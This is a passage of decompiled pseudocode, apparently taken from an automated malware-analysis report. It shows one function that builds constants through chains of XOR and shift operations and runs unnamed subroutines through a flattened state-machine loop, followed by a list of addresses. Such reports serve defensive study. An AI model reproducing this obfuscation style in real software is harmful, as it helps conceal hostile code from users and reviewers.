                                                                                                                                                                                                                    				signed int _v264;
                                                                                                                                                                                                                    				signed int _v268;
                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				signed int _v280;
                                                                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				signed int _v308;
                                                                                                                                                                                                                    				void* _t602;
                                                                                                                                                                                                                    				void* _t645;
                                                                                                                                                                                                                    				void* _t646;
                                                                                                                                                                                                                    				void* _t649;
                                                                                                                                                                                                                    				void* _t660;
                                                                                                                                                                                                                    				void* _t668;
                                                                                                                                                                                                                    				intOrPtr _t672;
                                                                                                                                                                                                                    				void* _t674;
                                                                                                                                                                                                                    				intOrPtr _t680;
                                                                                                                                                                                                                    				void* _t728;
                                                                                                                                                                                                                    				void* _t745;
                                                                                                                                                                                                                    				signed int _t747;
                                                                                                                                                                                                                    				signed int _t748;
                                                                                                                                                                                                                    				signed int _t749;
                                                                                                                                                                                                                    				signed int _t750;
                                                                                                                                                                                                                    				signed int _t751;
                                                                                                                                                                                                                    				signed int _t752;
                                                                                                                                                                                                                    				signed int _t753;
                                                                                                                                                                                                                    				signed int _t754;
                                                                                                                                                                                                                    				signed int _t755;
                                                                                                                                                                                                                    				signed int _t756;
                                                                                                                                                                                                                    				signed int _t757;
                                                                                                                                                                                                                    				signed int _t758;
                                                                                                                                                                                                                    				signed int _t759;
                                                                                                                                                                                                                    				void* _t760;
                                                                                                                                                                                                                    				intOrPtr _t763;
                                                                                                                                                                                                                    				signed int* _t765;
                                                                                                                                                                                                                    				void* _t772;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t680 = __ecx;
                                                                                                                                                                                                                    				_push(_a24);
                                                                                                                                                                                                                    				_v228 = __ecx;
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(0x20);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t602);
                                                                                                                                                                                                                    				_v16 = 0x34c9cd;
                                                                                                                                                                                                                    				_t763 = 0;
                                                                                                                                                                                                                    				_v12 = 0x6f54b1;
                                                                                                                                                                                                                    				_t765 =  &(( &_v308)[8]);
                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                    				_v144 = 0x449c58;
                                                                                                                                                                                                                    				_t674 = 0x2652352;
                                                                                                                                                                                                                    				_v144 = _v144 | 0xc15b9b6c;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0xc15f9f7c;
                                                                                                                                                                                                                    				_v256 = 0x78f4d;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0xa0bb6ca0;
                                                                                                                                                                                                                    				_v256 = _v256 | 0x2edde09e;
                                                                                                                                                                                                                    				_t747 = 0x13;
                                                                                                                                                                                                                    				_v256 = _v256 / _t747;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0x0935c8a1;
                                                                                                                                                                                                                    				_v120 = 0xbd57eb;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x9ac2f599;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x9a7fa272;
                                                                                                                                                                                                                    				_v48 = 0x72d88e;
                                                                                                                                                                                                                    				_v48 = _v48 + 0x85ea;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x00735e78;
                                                                                                                                                                                                                    				_v212 = 0x1fcf1b;
                                                                                                                                                                                                                    				_v212 = _v212 + 0xffff61ef;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x2d4b7fa8;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x2d544ea2;
                                                                                                                                                                                                                    				_v148 = 0x7adb95;
                                                                                                                                                                                                                    				_v148 = _v148 + 0x744d;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x007b4fe2;
                                                                                                                                                                                                                    				_v196 = 0xf72863;
                                                                                                                                                                                                                    				_v196 = _v196 + 0xffffaea7;
                                                                                                                                                                                                                    				_v196 = _v196 << 2;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x03db5c28;
                                                                                                                                                                                                                    				_v252 = 0x9a0bb;
                                                                                                                                                                                                                    				_t748 = 0x22;
                                                                                                                                                                                                                    				_v252 = _v252 / _t748;
                                                                                                                                                                                                                    				_v252 = _v252 | 0x647a6bd6;
                                                                                                                                                                                                                    				_v252 = _v252 << 0xf;
                                                                                                                                                                                                                    				_v252 = _v252 ^ 0x35ff8000;
                                                                                                                                                                                                                    				_v108 = 0xb711f0;
                                                                                                                                                                                                                    				_t749 = 0x54;
                                                                                                                                                                                                                    				_v108 = _v108 * 0x71;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x50ceeaf0;
                                                                                                                                                                                                                    				_v92 = 0x232df4;
                                                                                                                                                                                                                    				_v92 = _v92 << 2;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x008cb7d0;
                                                                                                                                                                                                                    				_v68 = 0x3aa31f;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x9e075bd1;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x9e3ffbdf;
                                                                                                                                                                                                                    				_v156 = 0x88408d;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x303657b6;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x663afe4d;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x5684e976;
                                                                                                                                                                                                                    				_v264 = 0x38a4e1;
                                                                                                                                                                                                                    				_v264 = _v264 << 3;
                                                                                                                                                                                                                    				_v264 = _v264 << 0xf;
                                                                                                                                                                                                                    				_v264 = _v264 / _t749;
                                                                                                                                                                                                                    				_v264 = _v264 ^ 0x01c218e2;
                                                                                                                                                                                                                    				_v172 = 0xc3f28d;
                                                                                                                                                                                                                    				_t750 = 0x42;
                                                                                                                                                                                                                    				_v172 = _v172 * 0x38;
                                                                                                                                                                                                                    				_v172 = _v172 * 0x41;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0xe2254927;
                                                                                                                                                                                                                    				_v52 = 0x799942;
                                                                                                                                                                                                                    				_v52 = _v52 >> 7;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0008cb5e;
                                                                                                                                                                                                                    				_v304 = 0x909474;
                                                                                                                                                                                                                    				_v304 = _v304 >> 4;
                                                                                                                                                                                                                    				_v304 = _v304 + 0xebb7;
                                                                                                                                                                                                                    				_v304 = _v304 + 0x578f;
                                                                                                                                                                                                                    				_v304 = _v304 ^ 0x0008ca9f;
                                                                                                                                                                                                                    				_v184 = 0x829b52;
                                                                                                                                                                                                                    				_v184 = _v184 << 7;
                                                                                                                                                                                                                    				_v184 = _v184 << 5;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0x29b87ab4;
                                                                                                                                                                                                                    				_v232 = 0x9475d;
                                                                                                                                                                                                                    				_v232 = _v232 + 0xffff028d;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0x520c7775;
                                                                                                                                                                                                                    				_v232 = _v232 + 0xffffd6ae;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0x5209ebff;
                                                                                                                                                                                                                    				_v216 = 0x2c21ae;
                                                                                                                                                                                                                    				_v216 = _v216 + 0xffff9c0d;
                                                                                                                                                                                                                    				_v216 = _v216 | 0xe3d38c21;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0xe3f73d36;
                                                                                                                                                                                                                    				_v296 = 0x449002;
                                                                                                                                                                                                                    				_v296 = _v296 | 0xb90feba2;
                                                                                                                                                                                                                    				_v296 = _v296 / _t750;
                                                                                                                                                                                                                    				_v296 = _v296 + 0xffff68f8;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x02ca33dd;
                                                                                                                                                                                                                    				_v168 = 0xc6af06;
                                                                                                                                                                                                                    				_v168 = _v168 + 0x3a65;
                                                                                                                                                                                                                    				_t166 =  &_v168; // 0x3a65
                                                                                                                                                                                                                    				_t751 = 0x55;
                                                                                                                                                                                                                    				_v168 =  *_t166 / _t751;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x00004b82;
                                                                                                                                                                                                                    				_v208 = 0x275e51;
                                                                                                                                                                                                                    				_v208 = _v208 << 0xd;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x8b5591dd;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x60900885;
                                                                                                                                                                                                                    				_v288 = 0x4ab53e;
                                                                                                                                                                                                                    				_v288 = _v288 + 0x964f;
                                                                                                                                                                                                                    				_v288 = _v288 | 0x2188838e;
                                                                                                                                                                                                                    				_v288 = _v288 + 0xffffd6ea;
                                                                                                                                                                                                                    				_v288 = _v288 ^ 0x21c895fc;
                                                                                                                                                                                                                    				_v200 = 0x96873d;
                                                                                                                                                                                                                    				_v200 = _v200 | 0x4f7a814b;
                                                                                                                                                                                                                    				_v200 = _v200 + 0xfa48;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x4ff5e037;
                                                                                                                                                                                                                    				_v136 = 0xa99d82;
                                                                                                                                                                                                                    				_v136 = _v136 >> 0xe;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x000fe628;
                                                                                                                                                                                                                    				_v80 = 0xf8a785;
                                                                                                                                                                                                                    				_v80 = _v80 * 0x3b;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x394c4f51;
                                                                                                                                                                                                                    				_v280 = 0xa2bf0d;
                                                                                                                                                                                                                    				_v280 = _v280 >> 0xa;
                                                                                                                                                                                                                    				_v280 = _v280 * 0x42;
                                                                                                                                                                                                                    				_v280 = _v280 | 0x0d1b6df2;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x0d1df6af;
                                                                                                                                                                                                                    				_v44 = 0xa077a9;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xffff1ab0;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x009242f1;
                                                                                                                                                                                                                    				_v176 = 0x601c73;
                                                                                                                                                                                                                    				_v176 = _v176 * 0x4e;
                                                                                                                                                                                                                    				_t752 = 0xc;
                                                                                                                                                                                                                    				_v176 = _v176 * 0x14;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0x49a43cec;
                                                                                                                                                                                                                    				_v272 = 0x43e2e1;
                                                                                                                                                                                                                    				_v272 = _v272 >> 6;
                                                                                                                                                                                                                    				_v272 = _v272 >> 0xc;
                                                                                                                                                                                                                    				_v272 = _v272 + 0xffffd4df;
                                                                                                                                                                                                                    				_v272 = _v272 ^ 0xfffe329b;
                                                                                                                                                                                                                    				_v72 = 0xb37bed;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x3e;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x2b7fa82a;
                                                                                                                                                                                                                    				_v240 = 0x6b33c9;
                                                                                                                                                                                                                    				_v240 = _v240 + 0x4cd7;
                                                                                                                                                                                                                    				_v240 = _v240 >> 0xb;
                                                                                                                                                                                                                    				_v240 = _v240 / _t752;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0x00075d21;
                                                                                                                                                                                                                    				_v128 = 0x490266;
                                                                                                                                                                                                                    				_v128 = _v128 | 0x99cac2d9;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x99c81c2a;
                                                                                                                                                                                                                    				_v248 = 0x5a80ca;
                                                                                                                                                                                                                    				_v248 = _v248 >> 0xb;
                                                                                                                                                                                                                    				_t753 = 0x14;
                                                                                                                                                                                                                    				_v248 = _v248 / _t753;
                                                                                                                                                                                                                    				_t754 = 0x62;
                                                                                                                                                                                                                    				_v248 = _v248 * 0x47;
                                                                                                                                                                                                                    				_v248 = _v248 ^ 0x000bc251;
                                                                                                                                                                                                                    				_v104 = 0x4b20bb;
                                                                                                                                                                                                                    				_v104 = _v104 + 0x18ce;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x004e5a57;
                                                                                                                                                                                                                    				_v64 = 0x74704a;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff4c66;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x00751fe4;
                                                                                                                                                                                                                    				_v112 = 0xe60747;
                                                                                                                                                                                                                    				_v112 = _v112 / _t754;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x0004c734;
                                                                                                                                                                                                                    				_v152 = 0xdefa5;
                                                                                                                                                                                                                    				_v152 = _v152 + 0xf7be;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x0002ede9;
                                                                                                                                                                                                                    				_v192 = 0xa6aa1e;
                                                                                                                                                                                                                    				_v192 = _v192 >> 3;
                                                                                                                                                                                                                    				_v192 = _v192 * 0x42;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x055c36b0;
                                                                                                                                                                                                                    				_v308 = 0xf3ae18;
                                                                                                                                                                                                                    				_v308 = _v308 | 0xb2801c21;
                                                                                                                                                                                                                    				_v308 = _v308 >> 6;
                                                                                                                                                                                                                    				_v308 = _v308 >> 0xb;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0x00008ccc;
                                                                                                                                                                                                                    				_v160 = 0xa181e5;
                                                                                                                                                                                                                    				_v160 = _v160 >> 2;
                                                                                                                                                                                                                    				_v160 = _v160 >> 7;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x000b971c;
                                                                                                                                                                                                                    				_v96 = 0xd556d7;
                                                                                                                                                                                                                    				_v96 = _v96 << 3;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x06aeb44a;
                                                                                                                                                                                                                    				_v180 = 0xcec70e;
                                                                                                                                                                                                                    				_v180 = _v180 + 0xffff9c97;
                                                                                                                                                                                                                    				_v180 = _v180 | 0x756d0358;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0x75ed0452;
                                                                                                                                                                                                                    				_v188 = 0x71e062;
                                                                                                                                                                                                                    				_v188 = _v188 | 0xdd44f01e;
                                                                                                                                                                                                                    				_v188 = _v188 + 0xffff9f80;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0xdd7660cc;
                                                                                                                                                                                                                    				_v268 = 0xdd1dd7;
                                                                                                                                                                                                                    				_v268 = _v268 + 0xffff03ae;
                                                                                                                                                                                                                    				_v268 = _v268 >> 0x10;
                                                                                                                                                                                                                    				_v268 = _v268 << 9;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x000b018d;
                                                                                                                                                                                                                    				_v276 = 0x4e9c84;
                                                                                                                                                                                                                    				_v276 = _v276 << 5;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x97c4f870;
                                                                                                                                                                                                                    				_v276 = _v276 | 0xe4b539cc;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0xfeb34ec0;
                                                                                                                                                                                                                    				_v284 = 0x7dde90;
                                                                                                                                                                                                                    				_v284 = _v284 | 0xc05b41a7;
                                                                                                                                                                                                                    				_v284 = _v284 << 5;
                                                                                                                                                                                                                    				_v284 = _v284 + 0x34ee;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x0ffd5834;
                                                                                                                                                                                                                    				_v204 = 0xc14d29;
                                                                                                                                                                                                                    				_t755 = 0x63;
                                                                                                                                                                                                                    				_v204 = _v204 * 0x7a;
                                                                                                                                                                                                                    				_v204 = _v204 | 0x63a4fbd9;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0x7fb8e485;
                                                                                                                                                                                                                    				_v40 = 0x19ca98;
                                                                                                                                                                                                                    				_v40 = _v40 << 2;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x006d62e7;
                                                                                                                                                                                                                    				_v292 = 0x12ef0b;
                                                                                                                                                                                                                    				_v292 = _v292 + 0x89e2;
                                                                                                                                                                                                                    				_v292 = _v292 << 0x10;
                                                                                                                                                                                                                    				_v292 = _v292 * 0x7b;
                                                                                                                                                                                                                    				_v292 = _v292 ^ 0x19d69551;
                                                                                                                                                                                                                    				_v116 = 0xb821cf;
                                                                                                                                                                                                                    				_v116 = _v116 * 0x46;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x32509ed9;
                                                                                                                                                                                                                    				_v124 = 0xe924d1;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xcd36ebca;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xcdd04699;
                                                                                                                                                                                                                    				_v224 = 0x9a1675;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x0e3fd311;
                                                                                                                                                                                                                    				_v224 = _v224 + 0xffff00b8;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x0eab916e;
                                                                                                                                                                                                                    				_v260 = 0x68acb9;
                                                                                                                                                                                                                    				_v260 = _v260 | 0x316e810e;
                                                                                                                                                                                                                    				_v260 = _v260 / _t755;
                                                                                                                                                                                                                    				_v260 = _v260 | 0x0df395dd;
                                                                                                                                                                                                                    				_v260 = _v260 ^ 0x0dfa53cb;
                                                                                                                                                                                                                    				_v76 = 0xe374dc;
                                                                                                                                                                                                                    				_v76 = _v76 | 0x791d6eb8;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x79f074c9;
                                                                                                                                                                                                                    				_v84 = 0xea29b;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x4eed42cc;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x4ee31980;
                                                                                                                                                                                                                    				_v100 = 0x520002;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xffffdba6;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x00501c97;
                                                                                                                                                                                                                    				_v132 = 0xadb37b;
                                                                                                                                                                                                                    				_t756 = 0x4a;
                                                                                                                                                                                                                    				_v132 = _v132 / _t756;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x000cfbac;
                                                                                                                                                                                                                    				_v140 = 0x73ce56;
                                                                                                                                                                                                                    				_v140 = _v140 * 0x69;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x2f75dc69;
                                                                                                                                                                                                                    				_v220 = 0xefa881;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0x3199b4c0;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0xb87a8e4d;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0x890a6a0e;
                                                                                                                                                                                                                    				_v88 = 0x504f8e;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x985a8e95;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x9806b9f0;
                                                                                                                                                                                                                    				_v56 = 0x9bef05;
                                                                                                                                                                                                                    				_v56 = _v56 >> 4;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x000dc940;
                                                                                                                                                                                                                    				_v300 = 0xac658;
                                                                                                                                                                                                                    				_v300 = _v300 + 0xbace;
                                                                                                                                                                                                                    				_v300 = _v300 + 0xe933;
                                                                                                                                                                                                                    				_v300 = _v300 + 0xffffebfe;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x00057a7e;
                                                                                                                                                                                                                    				_t745 = 0x544ff39;
                                                                                                                                                                                                                    				_v236 = 0xcc013a;
                                                                                                                                                                                                                    				_v236 = _v236 >> 0xf;
                                                                                                                                                                                                                    				_t757 = 0x26;
                                                                                                                                                                                                                    				_v236 = _v236 / _t757;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0x53c08538;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0x53c13fd4;
                                                                                                                                                                                                                    				_v60 = 0xfc4277;
                                                                                                                                                                                                                    				_v60 = _v60 << 0x10;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x4274d52c;
                                                                                                                                                                                                                    				_v164 = 0x5ad1d3;
                                                                                                                                                                                                                    				_t758 = 0xf;
                                                                                                                                                                                                                    				_v164 = _v164 / _t758;
                                                                                                                                                                                                                    				_v164 = _v164 + 0x237;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x000d7ccb;
                                                                                                                                                                                                                    				_v244 = 0x373c74;
                                                                                                                                                                                                                    				_v244 = _v244 | 0x5a61d457;
                                                                                                                                                                                                                    				_t759 = 0x71;
                                                                                                                                                                                                                    				_t760 = 0xb6a5cc1;
                                                                                                                                                                                                                    				_v244 = _v244 / _t759;
                                                                                                                                                                                                                    				_v244 = _v244 * 0x5b;
                                                                                                                                                                                                                    				_v244 = _v244 ^ 0x48d5a751;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t645 = 0xbd24763;
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						_t728 = 0xd026464;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                                    								_t772 = _t674 - _t760;
                                                                                                                                                                                                                    								if(_t772 > 0) {
                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								if(_t772 == 0) {
                                                                                                                                                                                                                    									_t649 = E00A6E227(_v268, _v28, _v32, _v24, _v276, _v284, _v204, _v212, _t680, _v148,  &_v36, _v40, _v292);
                                                                                                                                                                                                                    									_t765 =  &(_t765[0xb]);
                                                                                                                                                                                                                    									__eflags = _t649 - _v196;
                                                                                                                                                                                                                    									_t728 = 0xd026464;
                                                                                                                                                                                                                    									_t680 = _v228;
                                                                                                                                                                                                                    									_t645 = 0xbd24763;
                                                                                                                                                                                                                    									_t674 =  ==  ? 0xd026464 : 0x69cba97;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t674 == 0x2652352) {
                                                                                                                                                                                                                    										_t674 = 0x96ba810;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t674 == _t745) {
                                                                                                                                                                                                                    											E00A62984(_v236, _v156, _v60, _v164, _v244, _v32);
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t674 == 0x69cba97) {
                                                                                                                                                                                                                    												E00A76A6B(_v28, _v220, _v88, _v56, _v300);
                                                                                                                                                                                                                    												_t765 =  &(_t765[3]);
                                                                                                                                                                                                                    												_t674 = _t745;
                                                                                                                                                                                                                    												L14:
                                                                                                                                                                                                                    												_t680 = _v228;
                                                                                                                                                                                                                    												goto L1;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												if(_t674 == 0x8495202) {
                                                                                                                                                                                                                    													_push(_v128);
                                                                                                                                                                                                                    													_push(_v240);
                                                                                                                                                                                                                    													_push(_v72);
                                                                                                                                                                                                                    													__eflags = E00A7D648(_v248,  &_v20,  &_v24, _v104, 0xa614cc, E00A81E60(0xa614cc, _v272, __eflags), _v32, _v64, _v112, _v152, _v192, _v120) - _v48;
                                                                                                                                                                                                                    													_t674 =  ==  ? 0xe71c104 : _t745;
                                                                                                                                                                                                                    													E00A7D6DF(_v308, _t654, _v160, _v96);
                                                                                                                                                                                                                    													_t765 =  &(_t765[0xf]);
                                                                                                                                                                                                                    													goto L11;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													_t777 = _t674 - 0x96ba810;
                                                                                                                                                                                                                    													if(_t674 == 0x96ba810) {
                                                                                                                                                                                                                    														_push(_v304);
                                                                                                                                                                                                                    														_push(_v52);
                                                                                                                                                                                                                    														_push(_v172);
                                                                                                                                                                                                                    														_t660 = E00A81E60(0xa6149c, _v264, _t777);
                                                                                                                                                                                                                    														_push(_v296);
                                                                                                                                                                                                                    														_push(_v216);
                                                                                                                                                                                                                    														_push(_v232);
                                                                                                                                                                                                                    														E00A7EBA2(_v168, E00A81E60(0xa6146c, _v184, _t777), _v208, _v144, _t660,  &_v32, _v288);
                                                                                                                                                                                                                    														_t674 =  ==  ? 0x8495202 : 0x2231ac7;
                                                                                                                                                                                                                    														E00A7D6DF(_v200, _t660, _v136, _v80);
                                                                                                                                                                                                                    														E00A7D6DF(_v280, _t661, _v44, _v176);
                                                                                                                                                                                                                    														_t765 =  &(_t765[0xf]);
                                                                                                                                                                                                                    														_t745 = 0x544ff39;
                                                                                                                                                                                                                    														L11:
                                                                                                                                                                                                                    														_t760 = 0xb6a5cc1;
                                                                                                                                                                                                                    														L25:
                                                                                                                                                                                                                    														_t680 = _v228;
                                                                                                                                                                                                                    														_t645 = 0xbd24763;
                                                                                                                                                                                                                    														_t728 = 0xd026464;
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    												goto L26;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								L29:
                                                                                                                                                                                                                    								return _t763;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _t674 - _t645;
                                                                                                                                                                                                                    							if(_t674 == _t645) {
                                                                                                                                                                                                                    								_t646 = E00A7B1B9(_a24, _v76, _v84, 0x20, _v92, _v36, _v100);
                                                                                                                                                                                                                    								_t765 =  &(_t765[5]);
                                                                                                                                                                                                                    								_t674 = 0xffb64b6;
                                                                                                                                                                                                                    								__eflags = _t646 - _v68;
                                                                                                                                                                                                                    								_t763 =  ==  ? 1 : _t763;
                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								__eflags = _t674 - _t728;
                                                                                                                                                                                                                    								if(_t674 == _t728) {
                                                                                                                                                                                                                    									_t668 = E00A78C94(_v116, _a4, _t680, _v124, _v252, _v224, _v36, _v260);
                                                                                                                                                                                                                    									_t765 =  &(_t765[6]);
                                                                                                                                                                                                                    									__eflags = _t668 - _v108;
                                                                                                                                                                                                                    									_t680 = _v228;
                                                                                                                                                                                                                    									_t645 = 0xbd24763;
                                                                                                                                                                                                                    									_t674 =  ==  ? 0xbd24763 : 0xffb64b6;
                                                                                                                                                                                                                    									_t728 = 0xd026464;
                                                                                                                                                                                                                    									goto L3;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									__eflags = _t674 - 0xe71c104;
                                                                                                                                                                                                                    									if(_t674 == 0xe71c104) {
                                                                                                                                                                                                                    										_t672 = E00A7C6D9(_v24);
                                                                                                                                                                                                                    										__eflags = _t672;
                                                                                                                                                                                                                    										_v28 = _t672;
                                                                                                                                                                                                                    										_t674 =  !=  ? _t760 : _t745;
                                                                                                                                                                                                                    										goto L14;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										__eflags = _t674 - 0xffb64b6;
                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											E00A626E7(_v36, _v132, _v140);
                                                                                                                                                                                                                    											_t674 = 0x69cba97;
                                                                                                                                                                                                                    											goto L14;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                    						} while (_t674 != 0x2231ac7);
                                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}











































































































                                                                                                                                                                                                                    0x00a69082
                                                                                                                                                                                                                    0x00a6908c
                                                                                                                                                                                                                    0x00a69093
                                                                                                                                                                                                                    0x00a69097
                                                                                                                                                                                                                    0x00a6909e
                                                                                                                                                                                                                    0x00a690a5
                                                                                                                                                                                                                    0x00a690ac
                                                                                                                                                                                                                    0x00a690b3
                                                                                                                                                                                                                    0x00a690ba
                                                                                                                                                                                                                    0x00a690bc
                                                                                                                                                                                                                    0x00a690bd
                                                                                                                                                                                                                    0x00a690c2
                                                                                                                                                                                                                    0x00a690cd
                                                                                                                                                                                                                    0x00a690cf
                                                                                                                                                                                                                    0x00a690da
                                                                                                                                                                                                                    0x00a690dd
                                                                                                                                                                                                                    0x00a690e6
                                                                                                                                                                                                                    0x00a690f1
                                                                                                                                                                                                                    0x00a690f6
                                                                                                                                                                                                                    0x00a69101
                                                                                                                                                                                                                    0x00a6910c
                                                                                                                                                                                                                    0x00a69114
                                                                                                                                                                                                                    0x00a6911c
                                                                                                                                                                                                                    0x00a6912a
                                                                                                                                                                                                                    0x00a6912f
                                                                                                                                                                                                                    0x00a69135
                                                                                                                                                                                                                    0x00a6913d
                                                                                                                                                                                                                    0x00a69148
                                                                                                                                                                                                                    0x00a69153
                                                                                                                                                                                                                    0x00a6915e
                                                                                                                                                                                                                    0x00a69169
                                                                                                                                                                                                                    0x00a69174
                                                                                                                                                                                                                    0x00a6917f
                                                                                                                                                                                                                    0x00a69187
                                                                                                                                                                                                                    0x00a6918f
                                                                                                                                                                                                                    0x00a69197
                                                                                                                                                                                                                    0x00a6919f
                                                                                                                                                                                                                    0x00a691aa
                                                                                                                                                                                                                    0x00a691b5
                                                                                                                                                                                                                    0x00a691c0
                                                                                                                                                                                                                    0x00a691cb
                                                                                                                                                                                                                    0x00a691d6
                                                                                                                                                                                                                    0x00a691de
                                                                                                                                                                                                                    0x00a691e9
                                                                                                                                                                                                                    0x00a691f5
                                                                                                                                                                                                                    0x00a691fa
                                                                                                                                                                                                                    0x00a691fe
                                                                                                                                                                                                                    0x00a69206
                                                                                                                                                                                                                    0x00a6920b
                                                                                                                                                                                                                    0x00a69213
                                                                                                                                                                                                                    0x00a69226
                                                                                                                                                                                                                    0x00a69227
                                                                                                                                                                                                                    0x00a6922e
